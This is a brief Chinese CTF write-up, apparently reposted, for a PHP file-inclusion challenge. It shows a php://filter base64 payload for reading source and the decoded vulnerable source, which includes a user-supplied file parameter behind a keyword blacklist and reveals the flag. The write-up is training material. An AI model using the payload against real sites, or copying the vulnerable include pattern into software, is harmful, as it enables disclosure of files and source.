首页 > 代码库 > 南京邮电CTF平台做题writeup--web--文件包含
南京邮电CTF平台做题writeup--web--文件包含
明显的文件包含漏洞的格式网址,通过php://filter读取index源码-->php://filter/read=convert.base64-encode/resource=index.php
如下
再进行base64解码即可
<html> <title>asdf</title> <?php error_reporting(0); if(!$_GET[file]){echo ‘<a href="http://www.mamicode.com/index.php?file=show.php">click me? no</a>‘;} $file=$_GET[‘file‘]; if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){ echo "Oh no!"; exit(); } include($file); //flag:nctf{edulcni_elif_lacol_si_siht}?></html>
南京邮电CTF平台做题writeup--web--文件包含
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。